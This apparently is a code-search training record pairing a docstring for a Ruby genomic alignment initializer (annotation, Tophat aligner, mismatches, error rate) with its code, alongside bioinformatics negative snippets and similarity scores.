"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def translate(codon)\n x = Bio::Sequence::NA.new(codon)\n a = x.translate # or a = x.translate.codes \n return a\nend"
] |
[
"0.64750266",
"0.6085275",
"0.5994836",
"0.5935136",
"0.5934424",
"0.58259934",
"0.5712599",
"0.5695768",
"0.5645835",
"0.55811363",
"0.55595046",
"0.55595046",
"0.5535473",
"0.55088663",
"0.5488692",
"0.5471203",
"0.529536",
"0.5294155",
"0.52850974",
"0.5182773",
"0.515628",
"0.51434433",
"0.5137801",
"0.51301676",
"0.51238257",
"0.51238257",
"0.5110673",
"0.5086346",
"0.5062525",
"0.5042349",
"0.5038231",
"0.5020377",
"0.49903986",
"0.49839202",
"0.49736342",
"0.49660224",
"0.49485332",
"0.49476635",
"0.49450353",
"0.49391052",
"0.49007687",
"0.48859125",
"0.48859125",
"0.4870976",
"0.4853533",
"0.4851359",
"0.48475823",
"0.4840898",
"0.48361924",
"0.48349532",
"0.48115295",
"0.4807929",
"0.48067456",
"0.48013133",
"0.47986242",
"0.47680283",
"0.47668055",
"0.47448128",
"0.47236645",
"0.47196573",
"0.4706326",
"0.46965232",
"0.46911865",
"0.46686563",
"0.46595845",
"0.46188384",
"0.45977825",
"0.4588146",
"0.45881328",
"0.45854735",
"0.4582038",
"0.4578386",
"0.45757353",
"0.45739105",
"0.45712733",
"0.45612547",
"0.45565084",
"0.45564032",
"0.45521426",
"0.4551186",
"0.45470816",
"0.45419976",
"0.45398483",
"0.45272803",
"0.4515012",
"0.45091712",
"0.449412",
"0.44940704",
"0.44802955",
"0.4458519",
"0.4458212",
"0.4457093",
"0.44457522",
"0.44429055",
"0.44429055",
"0.44421718",
"0.44398886",
"0.44320858",
"0.44294125",
"0.44194305"
] |
0.55670184
|
10
|
Initializes genomic alignment parameters.
annotation: genomic annotation, needed for splicing awareness
tophat_aligner: software that Tophat uses (bowtie2 or bowtie1)
mismatches: max number of allowed mismatches in Tophat alignment
err: error rate for STAR / bucketizing
|
def initialize(names, force_overwrite, ref, software,
annotation, tophat_aligner, mismatches, err_rate)
super(names, force_overwrite, ref, software)
@annotation = annotation
@tophat_aligner = tophat_aligner
@mismatches = mismatches
@err_rate = err_rate
@mapped_bams = [] # per-bucket mapped BAMs, filled and merged during bucketized alignment
@unmapped_bams = [] # per-bucket unmapped BAMs, filled and merged during bucketized alignment
@max_mismatches = 0 # highest mismatch count used across buckets
end
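A minimal usage sketch of this initializer (hedged: the class name GenomicAligner and every argument value below are assumptions made for illustration; only the parameter list comes from the definition above, and the bucketizing role of err_rate is inferred from the companion bucketized_alignment method):
# Hypothetical call; class name and values are illustrative only.
aligner = GenomicAligner.new(
  names, true, 'genome.fa', :tophat, # arguments forwarded to super
  'genes.gtf', # annotation: GTF enabling splice-aware alignment
  :bowtie2,    # tophat_aligner: backend Tophat delegates to
  2,           # mismatches: max allowed in the Tophat alignment
  0.02         # err_rate: error rate for STAR / bucketizing
)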
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def initialize(seq_name,seq_fasta,seq_qual, seq_comment = '')\n super\n\n @actions = []\n @seq_fasta_orig = seq_fasta\n @seq_fasta = seq_fasta\n \n @seq_qual_orig = seq_qual\n @seq_qual = seq_qual \n \n @insert_start = 0\n @insert_end = seq_fasta.length-1 \n \n @stats={}\n @comments=[]\n \n @file_tags=[]\n \n # for paired ends\n @order_in_tuple=0\n @tuple_id=0\n @tuple_size=0\n @file_tag_tuple_priority=0\n \n end",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def initializeDefaultParameters()\n @phasing = 0\n @prePhasing = 0\n @yield = 0\n @percentPFReads = 0 # Percentage of purity filtered reads\n @numRawReads = 0 # Number of raw reads\n @numPFReads = 0 # Number of purity filtered reads\n @referencePath = \"\"\n @percentAligned = 0\n @percentError = 100\n @firstCycleInt = 0 # First cycle intensity\n @percentIntAfter20 = 0 # Percent intensity after 20 cycles\n @percentPerfectIndex = 0 # Percent of index reads matching perfectly\n @percent1MismatchIndex = 0 # Percentage of index reads with 1 mismatch\n @percentQ30Bases = 0 # Percentage of bases with Q30 or higher\n @meanQualScore = 0 # Mean quality score\n end",
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def initialize(gnex, t, s, b, e, len, fr, ph, iac, dot, cr, prob, ts)\n @gene_number, @number = gnex.split(\".\").map {|n| n.to_i }\n @exon_type = t\n @strand = s\n @first = b.to_i\n @last = e.to_i\n @length = len.to_i\n @frame = fr\n @phase = ph\n @i_ac = iac.to_i\n @do_t = dot.to_i\n @score = cr.to_i\n @p_value = prob.to_f\n @t_score = ts.to_f\n end",
"def initialize (params = {})\n @gene_id = params.fetch(:gene_id, \"AT0G00000\")\n @gene_name = params.fetch(:gene_name, \"no_gene\")\n @mutant_phenotype = params.fetch(:mutant_phenotype, \"no_phenotype\")\n @linked = params.fetch(:linked, false) #This will change if the gene is linked\n#Default params, in case we don't introduce any or they aren't correct\n @@total_gene_objects[gene_id] = self #This way, we store the data to retrieve it later\n end",
"def initialize (params={})\n @name=params.fetch(:name, \"Unknown\")\n @atcode=params.fetch(:atcode, \"Unknown\")\n regexp_atcode = Regexp.new(/A[tT][1-5][gG](\\d{5})/) # This checks if Arabidopsis gene name has the correct\n # nomenclature. If the regular expression doesn't match the input name, it won't become that gene name.\n if regexp_atcode.match(@atcode).to_s != @atcode\n puts \"WARNING: input string doesn't match Arabidopsis thaliana gene pattern.\"\n @atcode=\"Unknown\"\n end\n @seedcode=params.fetch(:seedcode, \"Unknown\")\n end",
"def init\n if super\n @offset = 0\n @sg = ITALY\n self\n end\n end",
"def initialize (apgp, template = nil, options = {})\n raise ArgumentError, \"An anchored PGP needs to be passed\" if apgp.nil?\n\n options ||= {}\n @apgp = apgp\n @template = template || DEFAULT_TEMPLATE\n @ignore_predicates = options[:ignore_predicates] || []\n @sortal_predicates = options[:sortal_predicates] || SORTAL_PREDICATES\n max_hop = options[:max_hop] || 2\n\n @s_var = 0\n @p_var = 0\n @x_var = 0\n\n @bgps = gen_bgps(apgp, max_hop)\n end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def initialize_parameters\n @omdb_params = [:i, :t, :type, :y, :plot, :r, :tomates, :callback, :v, :s] \n end",
"def initialize\n \n # @gene = []\n # @@current_generation = 1\n \n end",
"def align\n @genome = Genome.find(params[:id])\n @proteins = Protein.all\n @method = params[:method]\n\n if params[:method] == 'local'\n @message = 'Local alignment'\n align_all_local\n elsif params[:method] == 'global'\n @message = 'Global alignment'\n align_all_global\n end\n\n end",
"def align=(align)\n set_align(align)\n generate_buffers\n end",
"def initialize( config )\n @config = config\n\n self.top_align = self.top_font = self.right_align = self.right_font = 0\n\n init_with({\n :width => 500,\n :height => 300,\n :show_x_guidelines => false,\n :show_y_guidelines => true,\n :show_data_values => true,\n\n# :min_scale_value => 0,\n\n :show_x_labels => true,\n :stagger_x_labels => false,\n :rotate_x_labels => false,\n :step_x_labels => 1,\n :step_include_first_x_label => true,\n\n :show_y_labels => true,\n :rotate_y_labels => false,\n :stagger_y_labels => false,\n :scale_integers => false,\n\n :show_x_title => false,\n :x_title => 'X Field names',\n\n :show_y_title => false,\n :y_title_text_direction => :bt,\n :y_title => 'Y Scale',\n\n :show_graph_title => false,\n :graph_title => 'Graph Title',\n :show_graph_subtitle => false,\n :graph_subtitle => 'Graph Sub Title',\n :key => true, \n :key_position => :right, # bottom or right\n\n :font_size =>12,\n :title_font_size =>16,\n :subtitle_font_size =>14,\n :x_label_font_size =>12,\n :x_title_font_size =>14,\n :y_label_font_size =>12,\n :y_title_font_size =>14,\n :key_font_size =>10,\n \n :no_css =>false,\n :add_popups =>false,\n })\n\n\t\t\t\tset_defaults if respond_to? :set_defaults\n\n init_with config\n end",
"def process_annotation(params=nil)\n validate_params_solr_population(Sinatra::Helpers::SearchHelper::ALLOWED_INCLUDES_PARAMS)\n params ||= @params\n params_copy = params.dup\n\n text = params_copy.delete(\"text\")\n error 400, 'A text to be annotated must be supplied using the argument text=<text to be annotated>' if text.nil? || text.strip.empty?\n\n acronyms = restricted_ontologies_to_acronyms(params_copy)\n params_copy.delete(\"ontologies\")\n semantic_types = semantic_types_param(params_copy)\n params_copy.delete(\"semantic_types\")\n expand_class_hierarchy = params_copy.delete(\"expand_class_hierarchy\").eql?('true') # default = false\n class_hierarchy_max_level = params_copy.delete(\"class_hierarchy_max_level\").to_i # default = 0\n use_semantic_types_hierarchy = params_copy.delete(\"expand_semantic_types_hierarchy\").eql?('true') # default = false\n longest_only = params_copy.delete(\"longest_only\").eql?('true') # default = false\n expand_with_mappings = params_copy.delete(\"expand_mappings\").eql?('true') # default = false\n exclude_nums = params_copy.delete(\"exclude_numbers\").eql?('true') # default = false\n whole_word_only = params_copy.delete(\"whole_word_only\").eql?('false') ? false : true # default = true\n min_term_size = params_copy.delete(\"minimum_match_length\").to_i # default = 0\n exclude_synonyms = params_copy.delete(\"exclude_synonyms\").eql?('true') # default = false\n recognizer = (Annotator.settings.enable_recognizer_param && params_copy[\"recognizer\"]) || 'mgrep'\n params_copy.delete(\"recognizer\")\n\n annotator = nil\n\n # see if a name of the recognizer has been passed in, use default if not or error\n begin\n recognizer = recognizer.capitalize\n clazz = \"Annotator::Models::Recognizers::#{recognizer}\".split('::').inject(Object) {|o, c| o.const_get c}\n annotator = clazz.new\n rescue\n annotator = Annotator::Models::Recognizers::Mgrep.new\n end\n\n if params_copy[\"stop_words\"]\n annotator.stop_words = params_copy.delete(\"stop_words\")\n end\n\n params_copy.delete(\"display\")\n options = {\n ontologies: acronyms,\n semantic_types: semantic_types,\n use_semantic_types_hierarchy: use_semantic_types_hierarchy,\n filter_integers: exclude_nums,\n expand_class_hierarchy: expand_class_hierarchy,\n expand_hierarchy_levels: class_hierarchy_max_level,\n expand_with_mappings: expand_with_mappings,\n min_term_size: min_term_size,\n whole_word_only: whole_word_only,\n with_synonyms: !exclude_synonyms,\n longest_only: longest_only\n }\n options = params_copy.symbolize_keys().merge(options)\n\n begin\n annotations = annotator.annotate(text, options)\n\n unless includes_param.empty?\n # Move include param to special param so it only applies to classes\n params[\"include_for_class\"] = includes_param\n params.delete(\"display\")\n params.delete(\"include\")\n env[\"rack.request.query_hash\"] = params\n\n orig_classes = annotations.map {|a| [a.annotatedClass, a.hierarchy.map {|h| h.annotatedClass}, a.mappings.map {|m| m.annotatedClass}]}.flatten\n classes_hash = populate_classes_from_search(orig_classes, acronyms)\n annotations = replace_empty_classes(annotations, classes_hash) do |a|\n replace_empty_classes(a.hierarchy, classes_hash)\n replace_empty_classes(a.mappings, classes_hash)\n end\n end\n rescue LinkedData::Models::Ontology::ParsedSubmissionError => e\n error 404, e.message\n rescue Annotator::Models::NcboAnnotator::BadSemanticTypeError => e\n error 404, e.message\n end\n\n reply 200, annotations\n end",
"def initialize(params={})\n super\n\n @current_angle = 0\n additional_params = params.fetch(:additional_params, {})\n min_max = additional_params.fetch(:range, {:min => 30, :max => 150})\n @angle_range = Range.new(min_max[:min],min_max[:max])\n end",
"def print_align(io, sequences, labels, opts={})\n opts = {:cutoff => 70, :start => 0, :chars => 20}.merge(opts)\n (start, length, chars) = opts.values_at(:start, :cutoff, :chars)\n spacer = \" \"\n\n if opts[:template]\n sequences.unshift(opts[:template])\n labels.unshift(opts[:template_label])\n end\n\n all_stats = Array.new(6,0)\n loop do\n fin = false\n\n max_length = 0\n lines = []\n consensus_line = \"\"\n fragments = sequences.map do |string|\n fin = (start >= string.length )\n break if fin\n\n string_frag = string[start, length]\n\n string_frag\n end ; break if fin\n\n doubles = fragments.zip(labels)\n\n doubles = doubles.select {|frag, _| (frag.size > 0) && (frag =~ /[^-]/) }\n\n max_length = doubles.map {|frag, _| frag.size }.max\n\n (cs, stats) = consensus_string_and_stats( doubles.map {|frag,_| frag } )\n all_stats = all_stats.zip(stats).map {|a,b| a + b }\n\n doubles.push( [cs, \"<CONSENSUS>\"] )\n\n lines = doubles.map {|frag, label| [exactly_chars(label, chars),spacer,frag].join }\n\n ## the counters at the top of the line\n start_s = start.to_s\n finish_s = (start + max_length).to_s\n count_line_gap = max_length - (start_s.size + finish_s.size)\n count_line = [start_s, spacer]\n unless count_line_gap < 1\n count_line << \" \" * count_line_gap\n end\n io.puts [exactly_chars(\"\", chars), spacer, count_line.join].join\n\n io.puts lines.join(\"\\n\")\n\n io.puts \" \" # separator between lines\n start += length\n end\n end",
"def initilize(end_type = :single, adaptor_seq = \"GATCGGAAGAG\")\n @end_type = end_type\n @adaptor_seq = adaptor_seq\n end",
"def ranno_params=(ann)\n @@current_args = ann\n end",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def initialize (params = {}) # Get a value from the \"new\" call, or set a default\n # @id = \"Unknown_gene_id\", @prot=\"Unknown_protein_name\", @annot=\"Unknown_annotation\", @kegg_entryº=nil\n @id = params.fetch(:id, \"Unknown_gene_id\")\n @prot = params.fetch(:prot, \"Unknown_protein_name\")\n @annot = params.fetch(:annot, \"Unknown_annotation\")\n @kegg_entry = params.fetch(:kegg_entry, nil)\n end",
"def set_defaults\n super\n self.distance_from_intersection ||= 0\n self.lateral_offset ||= 0\n end",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def initAnts(targetName, freq)\n $stderr.puts \"Initializing antennas for target=#{targetName}, freq=#{freq}\";\n puts \"Initializing antennas for target=#{targetName}, freq=#{freq}\";\n\n @targetName = targetName;\n\n puts getAntList(\",\");\n lna();\n pams($pamBand);\n focus(freq);\n setLO(\"b\", freq);\n setLO(\"c\", freq);\n createEphem(targetName);\n track(@targetName);\n autoatten();\n\n $stderr.puts \"Finished Initializing antennas for target=#{targetName}, freq=#{freq}\";\n puts \"Finished Initializing antennas for target=#{targetName}, freq=#{freq}\";\n end",
"def setup compat\n freq = compat ? 4 : 5\n #TODO define all the commands\n @sizes = { \n 2 => freq*2+1,\n 3 => freq,\n 4 => 2\n }\n #TODO compute OK/NG from a complete @sizes\n @okng = [5, 6]\n end",
"def initialize_attributes\n @marker_count = nil\n @maximum_value = @minimum_value = nil\n @labels = {}\n @sort = false\n @sorted_drawing = false\n @title = nil\n\n @title_font = Gruff::Font.new(size: 36.0, bold: true)\n @marker_font = Gruff::Font.new(size: 21.0)\n @legend_font = Gruff::Font.new(size: 20.0)\n\n @top_margin = @bottom_margin = @left_margin = @right_margin = DEFAULT_MARGIN\n @legend_margin = LEGEND_MARGIN\n @title_margin = TITLE_MARGIN\n\n @legend_box_size = 20.0\n\n @no_data_message = 'No Data'\n\n @hide_line_markers = @hide_legend = @hide_title = @hide_line_numbers = @legend_at_bottom = false\n @center_labels_over_point = true\n @has_left_labels = false\n @label_stagger_height = 0\n @label_max_size = 0\n @label_truncation_style = :absolute\n\n @x_axis_increment = nil\n @x_axis_label = @y_axis_label = nil\n @y_axis_increment = nil\n\n @x_axis_label_format = nil\n @y_axis_label_format = nil\n end",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def initialize\n @class_name = default_class_name\n @rename_attrs = default_rename_attrs\n @exclude_attrs_on_create = default_exclude_attrs_on_create\n @exclude_attrs_on_update = default_exclude_attrs_on_update\n @associations = default_associations\n\n ScrapCbfRecord::Match.config = self\n\n super(*configs)\n end",
"def set_defaults\n self.bucket_agency_allocations = []\n end",
"def annotate\n genes={}\n File.open(ANNOTATION,'r').each do |line|\n temp=line.split\n genes[temp[9]]={}\n genes[temp[9]][\"start\"]=temp[3].to_i\n genes[temp[9]][\"end\"]=temp[4].to_i\n genes[temp[9]][\"strand\"]=temp[6]\n genes[temp[9]][\"length\"]=temp[4].to_i - 1 - temp[3].to_i\n end\n return genes\nend",
"def initialize (params = {})\n @gene_name = params.fetch(:gene_name,\"unknown\")\n @gene_phenotype = params.fetch(:gene_phenotype, \"unknown\") \n @gene_links = params.fetch(:gene_links, []) \n @gene_id = params.fetch(:gene_id,\"AT0G00000\") #gives default value\n\n end",
"def initialize(genome_fasta, hangover_length, options = {})\n starting_probe_number = options[:starting_probe_number]\n starting_probe_number ||= 1\n\n @filename = genome_fasta\n scaffolds = Bio::FinishM::ScaffoldBreaker.new.break_scaffolds(genome_fasta)\n @scaffolds = remove_overly_short_contigs!(scaffolds, hangover_length)\n\n # Remove scaffolds that have no good\n num_too_short_scaffolds = 0\n @scaffolds.reject! do |scaff|\n rej = scaff.contigs.empty?\n num_too_short_scaffolds += 1 if rej\n rej\n end\n if num_too_short_scaffolds > 0\n log.warn \"Removed #{num_too_short_scaffolds} scaffolds entirely as they were too short (or made up of all short contigs)\"\n end\n\n generate_numbered_probes(hangover_length, starting_probe_number)\n end",
"def initialize(randomness, ngram_size)\n @chains = []\n @input_set = []\n @randomness, @ngram_size = randomness, ngram_size\n end",
"def initializeDefaultParams()\n @fcName = nil # Flowcell name\n @baseCallsDir = nil # BaseCalls dir of the flowcell\n @useBasesMask = nil # Custom value to provide to BCL->FastQ convertor\n @sampleSheet = nil # Path to SampleSheet.csv\n\n yamlConfigFile = PathInfo::CONFIG_DIR + \"/config_params.yml\" \n @configReader = YAML.load_file(yamlConfigFile)\n @queue = SchedulerInfo::CASAVA_QUEUE # The processing queue on the cluster\n end",
"def annotation_params\n params.require(:annotation).permit(:audio_file_io, :start_second, :end_second, :notes)\n end",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def annot_params\n params.fetch(:annot, {})\n end",
"def alignment= value\n raise unless ALIGNMENTS.any? {|a| a == value }\n @alignment = value\n end",
"def initialize(protein, base, toppings)\n @protein = protein\n @base = base\n @toppings = toppings\n end",
"def initialize(protein, base, toppings)\n @protein = protein\n @base = base\n @toppings = toppings\n end",
"def initialize(protein, base, toppings)\n @protein = protein\n @base = base\n @toppings = toppings\n end",
"def genome_annotation\n self.genome_assembly.present? ? self.genome_assembly.current_annotation : nil\n end",
"def option_align\n @align = true\n end",
"def antibiogram_params\n\t\t\tparams.fetch(:antibiogram, {})\n\t\tend",
"def initialize (num_legs) #You can put specific table material in initialize\n\t\t@tabletop = []\n\t\t@num_legs = num_legs\n\tend",
"def alignmentMarkerLoad(inhash)\n \n log_info 'inhash', inhash # 1, 0\n if inhash[:sampleTypes] == 'DNA'\n alignment_markers = find(:item, sample: { name: MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]] })\n elsif inhash[:sampleTypes] == 'RNA'\n alignment_markers = find(:item, { sample: { name: MARKERS[inhash[:type_ind]] } } )\n end\n log_info 'alignment marker ', alignment_markers\n alignment_marker=-1\n if(!(alignment_markers.nil?))\n alignment_marker=alignment_markers[0] \n end\n log_info 'alignment_marker', alignment_marker\n # marker currently in machine (location)\n # marker_in_analyzer = find(:item, object_type: { name: \"Stripwell\" })\n # .find { |s| s.datum[:matrix][0][0] == alignment_marker.sample.id && s.location == \"Fragment analyzer\"} # old version\n \n # TODO: use check_alignment_marker function\n marker_in_analyzer = find(:item, object_type: {name: \"Stripwell\"}).find {|s| s.location == 'Fragment analyzer'}\n \n # is requested marker different from marker in machine?\n different_marker =! (alignment_markers.include?(marker_in_analyzer))\n \n # old marker?\n old_marker=( (marker_in_analyzer.get(:begin_date) ? (Date.today - (Date.parse marker_in_analyzer.get(:begin_date)) >= 7) : true) )\n \n # need to replace? \n marker_needs_replacing = (old_marker) || (different_marker)\n \n # new alignment marker\n alignment_marker_stripwell = find(:item, object_type: { name: \"Stripwell\" })\n .find { |s| collection_from(s).matrix[0][0] == alignment_marker.sample.id &&\n s != marker_in_analyzer }\n \n if(debug) \n show do\n title \"DEBUG\"\n note \"marker_in_analyzer=#{marker_in_analyzer}\"\n note \"different marker = #{different_marker}\"\n note \"marker_needs_replacing = #{marker_needs_replacing}\"\n note \"looking for #{MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]]}\"\n note \"alignment_marker_stripwell = #{alignment_marker_stripwell}\"\n end\n end\n\n # replace alignment marker\n if(marker_needs_replacing && alignment_marker_stripwell) \n show do\n title \"Place stripwell #{alignment_marker_stripwell} in buffer array\"\n note \"Move to the fragment analyzer.\"\n note \"Open ScreenGel software.\"\n check \"Click on the <b>Load Position</b> icon.\"\n check \"Open the sample door and retrieve the buffer tray.\"\n warning \"Be VERY careful while handling the buffer tray! Buffers can spill.\"\n if old_marker\n check \"Discard the current alignment marker stripwell (labeled #{marker_in_analyzer}).\"\n end\n check \"Place the alignment marker stripwell labeled #{alignment_marker_stripwell} in the MARKER 1 position of the buffer array.\"\n image \"make_marker_placement\"\n check \"Place the buffer tray in the buffer tray holder\"\n image \"make_marker_tray_holder\"\n check \"Close the sample door.\"\n end\n alignment_marker_stripwell.location = \"Fragment analyzer\"\n alignment_marker_stripwell.save\n if(old_marker) # replaced because old one was outdated\n alignment_marker_stripwell.associate :begin_date, Date.today.strftime \n alignment_marker_stripwell.save\n release [alignment_marker_stripwell] \n marker_in_analyzer.mark_as_deleted # trash outdated marker\n else # move current marker to SF2 (small fridge 2)\n marker_in_analyzer.location = \"SF2\"\n marker_in_analyzer.save\n end\n end\n end",
"def align(align=nil)\n @options[:align] = align unless align.nil?\n @options[:align]\n end",
